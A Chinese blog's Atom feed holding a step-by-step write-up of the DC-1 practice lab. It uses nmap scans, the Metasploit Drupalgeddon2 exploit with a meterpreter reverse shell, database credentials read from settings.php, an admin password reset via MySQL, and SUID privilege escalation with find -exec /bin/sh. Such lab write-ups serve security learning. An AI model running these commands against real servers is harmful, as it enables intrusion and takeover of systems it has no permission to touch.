<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom">
  <id>https://firefly.cuteleaf.cn/</id>
  <title type="text">Mudrock的博客</title>
  <subtitle type="text">记录学习与生活的点滴</subtitle>
  <updated>2026-08-04T00:00:00.000Z</updated>
  <author><name>Mudrock</name></author>
  <link rel="alternate" href="https://firefly.cuteleaf.cn/"/>
  <link rel="self" href="https://firefly.cuteleaf.cn/atom.xml"/>
  <generator uri="https://github.com/CuteLeaf/Firefly">Firefly v6.16.8</generator>
    <entry>
      <id>https://firefly.cuteleaf.cn/posts/dc1-pentest/</id>
      <title type="text">DC1靶场渗透测试</title>
      <published>2026-08-04T00:00:00.000Z</published>
      <updated>2026-08-04T00:00:00.000Z</updated>
      <author><name>kilolo</name></author>
      <link rel="alternate" href="https://firefly.cuteleaf.cn/posts/dc1-pentest/"/>
      <summary type="text">复现 DC-1 靶场（SUID提权）的完整渗透测试过程，包含信息收集、Drupalgeddon2 Getshell、配置文件信息泄露、数据库改密、后台登录与 SUID 提权。</summary>
      <content type="html"><![CDATA[<p>复现 DC-1 靶场（SUID提权）的完整渗透过程。</p>
<section><h2>环境准备<a href="#环境准备"><span>#</span></a></h2><p>完成环境搭建，DC-1和Kali虚拟机已就绪。</p><p>同属于192.168.200.0/24网段下，均为NET网络连接。</p><p>Kali虚拟机ip 192.168.200.133</p><p></p><figure><img alt="DC-1 靶场环境信息截图" loading="lazy" width="801" height="600" src="/_astro/dc1-01.BeiQWLPc_Z1EOEBK.webp" /><figcaption>DC-1 靶场环境信息截图</figcaption></figure><p></p></section>
<section><h2>信息收集：寻找目标与端口扫描<a href="#信息收集寻找目标与端口扫描"><span>#</span></a></h2><p>可见网段是192.168.200.0/24，扫描该网段，找到目标靶机DC-1</p><div><figure><figcaption><span></span><span>Terminal window</span></figcaption><pre><code><div><div><div>1</div></div><div><span>nmap</span><span> </span><span>-sP</span><span> </span><span>192.168.200.0/24</span></div></div></code></pre><div><div></div><div></div></div></figure></div><p></p><figure><img alt="nmap 扫描内网网段结果" loading="lazy" width="795" height="627" src="/_astro/dc1-02.CLPDdq8m_Z2xq4u.webp" /><figcaption>nmap 扫描内网网段结果</figcaption></figure><p></p><p>排除网关192.168.200.1 192.168.200.2</p><p>排除广播192.168.200.254</p><p>排除本机192.168.200.133</p><p>显然192.168.200.132就是DC-1靶机</p><p>扫描目标端口</p><div><figure><figcaption><span></span><span>Terminal window</span></figcaption><pre><code><div><div><div>1</div></div><div><span>nmap</span><span> </span><span>-A</span><span> </span><span>-p-</span><span> </span><span>-v</span><span> </span><span>192.168.200.132</span></div></div></code></pre><div><div></div><div></div></div></figure></div><p></p><figure><img alt="nmap 全端口扫描结果" loading="lazy" width="864" height="1134" src="/_astro/dc1-03.DD37POP1_Z2vf2q5.webp" /><figcaption>nmap 全端口扫描结果</figcaption></figure><p></p><p>可以找到</p><ul>
<li>22端口的OpenSSH 6.0p1</li>
<li>80端口的Apache 2.2.22</li>
<li>111/tcp</li>
<li>5139/tcp</li>
</ul></section>
<section><h2>Web 服务识别<a href="#web-服务识别"><span>#</span></a></h2><p>显然80端口有个网站，去访问192.168.200.132的80端口</p><p></p><figure><img alt="访问 192.168.200.132 网站首页" loading="lazy" width="1267" height="755" src="/_astro/dc1-04.CPEOyogg_Z8XSVf.webp" /><figcaption>访问 192.168.200.132 网站首页</figcaption></figure><p></p><p>Drupal 作为流行的 PHP CMS</p><p>从nmap可知是Drupal7架构的CMS</p></section>
<section><h2>Metasploit 的漏洞查找与利用 Getshell<a href="#metasploit-的漏洞查找与利用-getshell"><span>#</span></a></h2><p>用metasploit看看drupal 可以利用的漏洞</p><div><figure><figcaption><span></span><span>Terminal window</span></figcaption><pre><code><div><div><div>1</div></div><div><span>msfconsole</span></div></div></code></pre><div><div></div><div></div></div></figure></div><div><figure><figcaption><span></span><span>Terminal window</span></figcaption><pre><code><div><div><div>1</div></div><div><span>search</span><span> </span><span>drupal</span></div></div></code></pre><div><div></div><div></div></div></figure></div><p></p><figure><img alt="search drupal 搜索结果" loading="lazy" width="1266" height="1104" src="/_astro/dc1-05.BCJr3mwU_Z1Te6g0.webp" /><figcaption>search drupal 搜索结果</figcaption></figure><p></p><p>用这个远程执行漏洞</p><div><figure><figcaption><span></span><span>Terminal window</span></figcaption><pre><code><div><div><div>1</div></div><div><span>use</span><span> </span><span>exploit/unix/webapp/drupal_drupalgeddon2</span></div></div></code></pre><div><div></div><div></div></div></figure></div><p>查看当前需要参数</p><div><figure><figcaption><span></span><span>Terminal window</span></figcaption><pre><code><div><div><div>1</div></div><div><span>show</span><span> </span><span>options</span></div></div></code></pre><div><div></div><div></div></div></figure></div><p>填入需要的参数，靶机ip 和目标端口</p><div><figure><figcaption><span></span><span>Terminal window</span></figcaption><pre><code><div><div><div>1</div></div><div><span>set</span><span> </span><span>RHOSTS</span><span> </span><span>192.168.200.132</span></div></div><div><div><div>2</div></div><div><span>set</span><span> </span><span>RPORT</span><span> </span><span>80</span></div></div></code></pre><div><div></div><div></div></div></figure></div><p>靶机是php环境/meterpreter shell/反向连接</p><div><figure><figcaption><span></span><span>Terminal window</span></figcaption><pre><code><div><div><div>1</div></div><div><span>set</span><span> </span><span>payload</span><span> </span><span>php/meterpreter/reverse_tcp</span></div></div></code></pre><div><div></div><div></div></div></figure></div><p>本机ip和监听端口</p><div><figure><figcaption><span></span><span>Terminal window</span></figcaption><pre><code><div><div><div>1</div></div><div><span>set</span><span> </span><span>LHOST</span><span> </span><span>192.168.200.133</span></div></div><div><div><div>2</div></div><div><span>set</span><span> </span><span>LPORT</span><span> </span><span>4444</span></div></div></code></pre><div><div></div><div></div></div></figure></div><p>运行</p><div><figure><figcaption><span></span><span>Terminal window</span></figcaption><pre><code><div><div><div>1</div></div><div><span>Run</span></div></div></code></pre><div><div></div><div></div></div></figure></div><p></p><figure><img alt="msf Run 执行漏洞利用" loading="lazy" width="1206" height="561" src="/_astro/dc1-06.CTJNSEuw_Z1Ag1C9.webp" /><figcaption>msf Run 执行漏洞利用</figcaption></figure><p></p><p>成功连接，查看基础配置，确认是DC-1靶机</p><p></p><figure><img alt="Meterpreter 会话连接成功" loading="lazy" width="1146" height="606" src="/_astro/dc1-07.D0ytyEnA_1RxxNK.webp" /><figcaption>Meterpreter 会话连接成功</figcaption></figure><p></p><p>生成一个交互式shell，原来那个看起来太难受了</p><div><figure><figcaption><span></span><span>Terminal window</span></figcaption><pre><code><div><div><div>1</div></div><div><span>python</span><span> </span><span>-c</span><span> </span><span>"import pty;pty.spawn('/bin/bash')"</span></div></div></code></pre><div><div></div><div></div></div></figure></div></section>
<section><h2>Flag1：查看当前目录<a href="#flag1查看当前目录"><span>#</span></a></h2><p>查看当前目录，发现flag1</p><p></p><figure><img alt="当前目录下发现 flag1" loading="lazy" width="852" height="273" src="/_astro/dc1-08.C3LOqN94_OVTXQ.webp" /><figcaption>当前目录下发现 flag1</figcaption></figure><p></p><div><figure><figcaption><span></span><span>Terminal window</span></figcaption><pre><code><div><div><div>1</div></div><div><span>cat</span><span> </span><span>flag1.txt</span></div></div></code></pre><div><div></div><div></div></div></figure></div><p></p><figure><img alt="读取 flag1.txt" loading="lazy" width="609" height="117" src="/_astro/dc1-09.xYjnDbIX_U9kj1.webp" /><figcaption>读取 flag1.txt</figcaption></figure><p></p><p>flag1内容：每个好的CMS都需要一个配置文件——你也是。</p><p>上面翻译，提示我们需要去找CMS配置文件</p><p>配置文件大都是这样的，我们查找一下，config、Settings等</p><div><figure><figcaption><span></span><span>Terminal window</span></figcaption><pre><code><div><div><div>1</div></div><div><span>find</span><span> </span><span>.</span><span> </span><span>-name</span><span> </span><span>"con*"</span></div></div></code></pre><div><div></div><div></div></div></figure></div><p>貌似没有</p><div><figure><figcaption><span></span><span>Terminal window</span></figcaption><pre><code><div><div><div>1</div></div><div><span>find</span><span> </span><span>.</span><span> </span><span>-name</span><span> </span><span>"set*"</span></div></div></code></pre><div><div></div><div></div></div></figure></div><p></p><figure><img alt="find 查找配置文件结果" loading="lazy" width="543" height="261" src="/_astro/dc1-10.qWVtF_sU_Z2trBbC.webp" /><figcaption>find 查找配置文件结果</figcaption></figure><p></p><p>看看是不是</p><p></p><figure><img alt="查看 settings.php 配置内容" loading="lazy" width="1266" height="1104" src="/_astro/dc1-11.C8JLxmvD_ZjkK2v.webp" /><figcaption>查看 settings.php 配置内容</figcaption></figure><p></p><p>找到flag2了</p></section>
<section><h2>Flag2：配置文件，数据库登录，MySQL 修改 admin 密码<a href="#flag2配置文件数据库登录mysql-修改-admin-密码"><span>#</span></a></h2><p>flag2内容：暴力破解和字典攻击并不是获取访问权限的唯一途径（你肯定需要访问权限）。使用这些凭据，你可以做什么？</p><p>这是数据库配置文件，数据库账号密码以及数据库名字</p><div><figure><figcaption></figcaption><pre><code><div><div><div>1</div></div><div><span>'database'</span><span> =&gt; </span><span>'drupaldb'</span><span>,</span></div></div><div><div><div>2</div></div><div><span>'username'</span><span> =&gt; </span><span>'dbuser'</span><span>,</span></div></div><div><div><div>3</div></div><div><span>'password'</span><span> =&gt; </span><span>'R0ck3t'</span><span>,</span></div></div><div><div><div>4</div></div><div><span>'host'</span><span> =&gt; </span><span>'localhost'</span><span>,</span></div></div><div><div><div>5</div></div><div><span>'port'</span><span> =&gt; </span><span>''</span><span>,</span></div></div><div><div><div>6</div></div><div><span>'driver'</span><span> =&gt; </span><span>'mysql'</span><span>,</span></div></div><div><div><div>7</div></div><div><span>'prefix'</span><span> =&gt; </span><span>''</span><span>,</span></div></div></code></pre><div><div></div><div></div></div></figure></div><p>这提示接下来要去数据库里面找账号密码</p><p>尝试登录一下</p><div><figure><figcaption><span></span><span>Terminal window</span></figcaption><pre><code><div><div><div>1</div></div><div><span>mysql</span><span> </span><span>-udbuser</span><span> </span><span>-pR0ck3t</span></div></div></code></pre><div><div></div><div></div></div></figure></div><p></p><figure><img alt="MySQL 登录成功" loading="lazy" width="1137" height="459" src="/_astro/dc1-12.CQuXZb-k_Z1vCmFv.webp" /><figcaption>MySQL 登录成功</figcaption></figure><p></p><div><figure><figcaption></figcaption><pre><code><div><div><div>1</div></div><div><span>show databases;</span></div></div></code></pre><div><div></div><div></div></div></figure></div><p>找到两个数据库，看看drupaldb里面</p><div><figure><figcaption></figcaption><pre><code><div><div><div>1</div></div><div><span>use</span><span> drupaldb;</span></div></div></code></pre><div><div></div><div></div></div></figure></div><p></p><figure><img alt="进入 drupaldb 数据库" loading="lazy" width="810" height="432" src="/_astro/dc1-13.Dc7K0tpK_1jffxz.webp" /><figcaption>进入 drupaldb 数据库</figcaption></figure><p></p><div><figure><figcaption></figcaption><pre><code><div><div><div>1</div></div><div><span>show tables;</span></div></div></code></pre><div><div></div><div></div></div></figure></div><p></p><figure><img alt="drupaldb 数据表列表" loading="lazy" width="1266" height="1104" src="/_astro/dc1-14.IuK5TfdI_ZskKh3.webp" /><figcaption>drupaldb 数据表列表</figcaption></figure><p></p><div><figure><figcaption></figcaption><pre><code><div><div><div>1</div></div><div><span>select</span><span> * </span><span>from</span><span> users;</span></div></div></code></pre><div><div></div><div></div></div></figure></div><p></p><figure><img alt="查询 users 表内容" loading="lazy" width="1265" height="394" src="/_astro/dc1-15.CZ3_0-Hl_Zt0ckB.webp" /><figcaption>查询 users 表内容</figcaption></figure><p></p><p>密码被加密了，哈希加密？</p><p>直接改肯定不行，我们需要同样的加密密码，或者说加密方式，来让我们新建一个或者直接改admin的</p><p>去找到这个密码的加密方式，搜了一下，这是Drupal 自带脚本生成新哈希</p><div><figure><figcaption><span></span><span>Terminal window</span></figcaption><pre><code><div><div><div>1</div></div><div><span>./scripts/password-hash.sh</span></div></div></code></pre><div><div></div><div></div></div></figure></div><p></p><figure><img alt="查看 password-hash.sh 脚本" loading="lazy" width="1266" height="1028" src="/_astro/dc1-16.CC0COBgA_1t0izK.webp" /><figcaption>查看 password-hash.sh 脚本</figcaption></figure><p></p><p>后面直接加密码就可以了，得到哈希</p><div><figure><figcaption><span></span><span>Terminal window</span></figcaption><pre><code><div><div><div>1</div></div><div><span>./scripts/password-hash.sh</span><span> </span><span>123456</span></div></div></code></pre><div><div></div><div></div></div></figure></div><p>得到哈希：</p><div><figure><figcaption></figcaption><pre><code><div><div><div>1</div></div><div><span>$S$D6wT3bSlxEJJxqbokmIY2GfIPBsJZ3DJFd4VGBTY0xLoWcyBWNIY</span></div></div></code></pre><div><div></div><div></div></div></figure></div><p>接下来我们回去数据库改密码就可以了</p><div><figure><figcaption></figcaption><pre><code><div><div><div>1</div></div><div><span>update</span><span> users </span><span>set</span><span><span> pass</span><span>=</span></span><span>'$S$D6wT3bSlxEJJxqbokmIY2GfIPBsJZ3DJFd4VGBTY0xLoWcyBWNIY'</span><span> </span><span>where</span><span> </span><span>name</span><span>=</span><span>"admin"</span><span>;</span></div></div></code></pre><div><div></div><div></div></div></figure></div><p></p><figure><img alt="update users 修改 admin 密码" loading="lazy" width="1266" height="520" src="/_astro/dc1-17.BmUlWgIQ_1qI40d.webp" /><figcaption>update users 修改 admin 密码</figcaption></figure><p></p></section>
<section><h2>Flag3：登录后台<a href="#flag3登录后台"><span>#</span></a></h2><p>去访问192.168.200.132的80，登录即可，账号admin，密码123456</p><p></p><figure><img alt="Drupal 后台登录页面" loading="lazy" width="1289" height="813" src="/_astro/dc1-18.DAx8uM3c_Zb0waH.webp" /><figcaption>Drupal 后台登录页面</figcaption></figure><p></p><p>然后在左上角发现了flag3</p><p></p><figure><img alt="Drupal 后台页面" loading="lazy" width="1572" height="645" src="/_astro/dc1-19.CeocmuJc_kBBsX.webp" /><figcaption>Drupal 后台页面</figcaption></figure><p></p><p></p><figure><img alt="左上角 flag3 内容" loading="lazy" width="1650" height="564" src="/_astro/dc1-20.XMG8_IQA_Z2gUnLm.webp" /><figcaption>左上角 flag3 内容</figcaption></figure><p></p><p>flag3提示：特殊权限能帮你找到 passwd 文件——但你得用 -exec 参数来执行命令，才能读取 shadow 里的内容。</p><p>所以接下来我们要提权，去看passwd</p></section>
<section><h2>Flag4：passwd 与用户家目录<a href="#flag4passwd-与用户家目录"><span>#</span></a></h2><p>但貌似我们有权限能直接看？</p><p></p><figure><img alt="查看 /etc/passwd 文件" loading="lazy" width="960" height="930" src="/_astro/dc1-21.BOuL2Ty5_Z209iMW.webp" /><figcaption>查看 /etc/passwd 文件</figcaption></figure><p></p><p>这里发现有一个Flag4的用户</p><p>去家目录看看</p><div><figure><figcaption><span></span><span>Terminal window</span></figcaption><pre><code><div><div><div>1</div></div><div><span>cd</span><span> </span><span>/home/flag4</span></div></div><div><div><div>2</div></div><div><span>ls</span></div></div><div><div><div>3</div></div><div><span>cat</span><span> </span><span>flag4.txt</span></div></div></code></pre><div><div></div><div></div></div></figure></div><p></p><figure><img alt="读取 /home/flag4/flag4.txt" loading="lazy" width="981" height="378" src="/_astro/dc1-22.C4-Aip0d_1YBAI8.webp" /><figcaption>读取 /home/flag4/flag4.txt</figcaption></figure><p></p><p>flag4提示：你能用同样的方法在 root 里找到或者访问那个 flag 吗？</p><p>可能可以。但也许没那么容易。或者，也许很简单？</p><p>提示我们下一个在root的家目录</p><div><figure><figcaption><span></span><span>Terminal window</span></figcaption><pre><code><div><div><div>1</div></div><div><span>cat</span><span> </span><span>/root</span></div></div></code></pre><div><div></div><div></div></div></figure></div><p>发现没有权限，那接下来就是提权了</p><p></p><figure><img alt="尝试读取 root 目录无权限" loading="lazy" width="588" height="164" src="/_astro/dc1-23.DHJ9iXbD_1etxLr.webp" /><figcaption>尝试读取 root 目录无权限</figcaption></figure><p></p></section>
<section><h2>Flag5：SUID 提权，root目录下的Flag5<a href="#flag5suid-提权root目录下的flag5"><span>#</span></a></h2><p>查找sudo的文件，属于 root 的有 s 权限的文件</p><div><figure><figcaption><span></span><span>Terminal window</span></figcaption><pre><code><div><div><div>1</div></div><div><span>find</span><span> </span><span>/</span><span> </span><span>-perm</span><span> </span><span>-u=s</span><span> </span><span>-type</span><span> </span><span>f</span><span> 2&gt;</span><span>/dev/null</span></div></div></code></pre><div><div></div><div></div></div></figure></div><p></p><figure><img alt="find 查找 SUID 文件结果" loading="lazy" width="1136" height="720" src="/_astro/dc1-24.CmPjLIha_Z2s1x0E.webp" /><figcaption>find 查找 SUID 文件结果</figcaption></figure><p></p><p>at 是不行的</p><div><figure><figcaption><span></span><span>Terminal window</span></figcaption><pre><code><div><div><div>1</div></div><div><span>echo</span><span> </span><span>"/bin/sh &lt;$(</span><span>tty</span><span>) &gt;$(</span><span>tty</span><span>) 2&gt;$(</span><span>tty</span><span>)"</span><span> | </span><span>at</span><span> </span><span>now</span><span>; </span><span>tail</span><span> </span><span>-f</span><span> </span><span>/dev/null</span></div></div></code></pre><div><div></div><div></div></div></figure></div><p>被拉黑了</p><p>只有find</p><div><figure><figcaption><span></span><span>Terminal window</span></figcaption><pre><code><div><div><div>1</div></div><div><span>find</span><span> </span><span>.</span><span> </span><span>-exec</span><span> </span><span>/bin/sh</span><span> </span><span>\;</span><span> </span><span>-quit</span></div></div></code></pre><div><div></div><div></div></div></figure></div><p></p><figure><img alt="find -exec /bin/sh 提权成功" loading="lazy" width="1002" height="207" src="/_astro/dc1-25.C9YeuyQW_1hpCBV.webp" /><figcaption>find -exec /bin/sh 提权成功</figcaption></figure><p></p><p>成功提权</p><div><figure><figcaption><span></span><span>Terminal window</span></figcaption><pre><code><div><div><div>1</div></div><div><span>cd</span><span> </span><span>/root</span></div></div><div><div><div>2</div></div><div><span>ls</span></div></div><div><div><div>3</div></div><div><span>cat</span><span> </span><span>thefinalflag.txt</span></div></div></code></pre><div><div></div><div></div></div></figure></div><p></p><figure><img alt="读取 thefinalflag.txt 成功通关" loading="lazy" width="825" height="471" src="/_astro/dc1-26.BcjjOvwO_2oECoI.webp" /><figcaption>读取 thefinalflag.txt 成功通关</figcaption></figure><p></p><p>Flag1-5均找到了，成功完成DC-1靶机的渗透！</p><hr /><section><h3>DC-1 渗透测试流程图<a href="#dc-1-渗透测试流程图"><span>#</span></a></h3><div><div><div><div><span></span></div><div><span></span></div><div><span></span></div><div><span></span></div><div><span></span></div><div><span></span></div><div><span></span></div><div><span></span></div><div><span></span></div><div><span></span></div><div><span></span></div><div><span></span></div><div><span></span></div><div><span><p>被拉黑</p></span></div><div><span></span></div><div><span><p>环境准备<br /><br />DC-1 与 Kali 同处 192.168.200.0/24 网段<br /><br />Kali 攻击机 192.168.200.133</p></span></div><div><span><p>信息收集<br /><br />nmap -sP 扫描网段<br /><br />目标 DC-1 192.168.200.132</p></span></div><div><span><p>nmap -A -p- 全端口扫描<br /><br />发现 22 SSH、80 Apache<br /><br />识别 CMS 为 Drupal 7</p></span></div><div><span><p>访问 192.168.200.132:80</p></span></div><div><span><p>Metasploit<br /><br />search drupal 找到 drupalgeddon2</p></span></div><div><span><p>set 参数并 Run<br /><br />获得 php/meterpreter 会话</p></span></div><div><span><p>python 生成交互 shell<br /><br />当前目录发现 Flag1</p></span></div><div><span><p>按 Flag1 提示找 CMS 配置文件<br /><br />find set* 找到 settings.php<br /><br />发现 Flag2 与数据库凭据</p></span></div><div><span><p>mysql 登录 drupaldb<br /><br />查询 users 表发现加密密码</p></span></div><div><span><p>./scripts/password-hash.sh 生成哈希<br /><br />update users 修改 admin 密码</p></span></div><div><span><p>登录 Drupal 后台<br /><br />左上角发现 Flag3</p></span></div><div><span><p>按 Flag3 提示查看 /etc/passwd<br /><br />发现 flag4 用户<br /><br />读取 /home/flag4/flag4.txt 得到 Flag4</p></span></div><div><span><p>尝试 cat /root 无权限<br /><br />find 查找 SUID 文件</p></span></div><div><span><p>at 提权?</p></span></div><div><span><p>find . -exec /bin/sh \; -quit<br /><br />提权成功</p></span></div><div><span><p>cd /root 读取 thefinalflag.txt<br /><br />得到 Flag5<br /><br />Flag1-5 全部找到，成功通关</p></span></div>
</div><div><div><span></span></div><div><span></span></div><div><span></span></div><div><span></span></div><div><span></span></div><div><span></span></div><div><span></span></div><div><span></span></div><div><span></span></div><div><span></span></div><div><span></span></div><div><span></span></div><div><span></span></div><div><span><p>被拉黑</p></span></div><div><span></span></div><div><span><p>环境准备<br /><br />DC-1 与 Kali 同处 192.168.200.0/24 网段<br /><br />Kali 攻击机 192.168.200.133</p></span></div><div><span><p>信息收集<br /><br />nmap -sP 扫描网段<br /><br />目标 DC-1 192.168.200.132</p></span></div><div><span><p>nmap -A -p- 全端口扫描<br /><br />发现 22 SSH、80 Apache<br /><br />识别 CMS 为 Drupal 7</p></span></div><div><span><p>访问 192.168.200.132:80</p></span></div><div><span><p>Metasploit<br /><br />search drupal 找到 drupalgeddon2</p></span></div><div><span><p>set 参数并 Run<br /><br />获得 php/meterpreter 会话</p></span></div><div><span><p>python 生成交互 shell<br /><br />当前目录发现 Flag1</p></span></div><div><span><p>按 Flag1 提示找 CMS 配置文件<br /><br />find set* 找到 settings.php<br /><br />发现 Flag2 与数据库凭据</p></span></div><div><span><p>mysql 登录 drupaldb<br /><br />查询 users 表发现加密密码</p></span></div><div><span><p>./scripts/password-hash.sh 生成哈希<br /><br />update users 修改 admin 密码</p></span></div><div><span><p>登录 Drupal 后台<br /><br />左上角发现 Flag3</p></span></div><div><span><p>按 Flag3 提示查看 /etc/passwd<br /><br />发现 flag4 用户<br /><br />读取 /home/flag4/flag4.txt 得到 Flag4</p></span></div><div><span><p>尝试 cat /root 无权限<br /><br />find 查找 SUID 文件</p></span></div><div><span><p>at 提权?</p></span></div><div><span><p>find . -exec /bin/sh \; -quit<br /><br />提权成功</p></span></div><div><span><p>cd /root 读取 thefinalflag.txt<br /><br />得到 Flag5<br /><br />Flag1-5 全部找到，成功通关</p></span></div>
</div></div></div></section><section><h3>总体思路总结与吐槽<a href="#总体思路总结与吐槽"><span>#</span></a></h3><ul>
<li>信息收集：<code>nmap -sP</code> 扫网段定位 DC-1（192.168.200.132），再用 <code>nmap -A -p- -v</code> 全端口扫描，发现 22、80、111、5139 端口，确认 80 端口是 Drupal 7。</li>
<li>权限获取：Metasploit 用 <code>drupal_drupalgeddon2</code> 直接拿 meterpreter 会话；按 flag1 提示找到 <code>settings.php</code>，拿到数据库账号密码（flag2）；用 Drupal 自带 <code>./scripts/password-hash.sh</code> 生成新哈希，在数据库里改掉 admin 密码，登录后台拿到 flag3。</li>
<li>提权与收尾：<code>/etc/passwd</code> 里发现 flag4 用户，读到家目录的 flag4；常规 SUID 提权时 <code>at</code> 被拉黑，改用经典的 <code>find . -exec /bin/sh \; -quit</code> 拿到 root，读取 <code>thefinalflag.txt</code>，五个 flag 全部找到。</li>
</ul><p>跟着5个flag的提示来进行就可以了。SUID提权只能用find命令。</p><p>metasploit 依旧轮椅。</p></section></section>]]></content>
    </entry>
</feed>
